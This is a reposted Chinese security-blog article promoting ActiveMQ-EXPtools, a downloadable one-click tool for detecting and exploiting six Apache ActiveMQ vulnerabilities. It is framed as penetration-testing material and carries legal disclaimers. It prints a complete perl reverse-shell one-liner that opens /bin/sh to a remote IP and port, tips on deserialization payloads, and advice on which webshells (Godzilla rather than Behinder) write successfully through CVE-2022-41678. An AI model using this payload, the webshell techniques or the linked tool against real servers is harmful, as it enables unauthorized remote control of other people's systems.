文章总结： ActiveMQ-EXPtools是一款针对ApacheActiveMQ全系列漏洞的一键检测与利用工具，支持CVE-2015-5254、CVE-2023-46604等6个漏洞的检测和利用。文档详细说明了各漏洞的利用方法，如CVE-2015-5254使用反序列化数据反弹shell，CVE-2022-41678需注意认证头部和webshell写入技巧。工具提供下载链接并强调仅限合法安全测试使用。 综合评分： 78 文章分类： 漏洞分析,安全工具,WEB安全,渗透测试,解决方案

ActiveMQ-EXPtools | Apache ActiveMQ全系列漏洞一键支持检测和利用工具

黑白之道

2026年4月22日 09:16 江西

在小说阅读器读本章

去阅读

工具介绍

ActiveMQ-EXPtools支持检测和利用Apache ActiveMQ漏洞，CVE-2015-5254，CVE-2016-3088，CVE-2022-41678，CVE-2023-46604，CVE-2024-32114，CVE-2026-34197。作者：Catherines77

漏洞利用说明

CVE-2015-5254

java-chains生成反序列化数据，验证漏洞时可以用URLDNS

在反弹shell时最好用perl，sh和bash有时弹不了

/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

CVE-2022-41678

自定义webshell写入时，冰蝎马写入会报500，哥斯拉正常。工具连接时注意要加上认证头部

参考致谢

https://github.com/URJACK2025/CVE-2022-41678

https://github.com/vulhub/vulhub

https://github.com/vulhub/java-chains

工具下载

https://github.com/Catherines77/ActiveMQ-EXPtools/releases/tag/1.0

文章来源：李白你好

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

如侵权请私聊我们删文

END

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：黑白之道 《ActiveMQ-EXPtools | Apache ActiveMQ全系列漏洞一键支持检测和利用工具》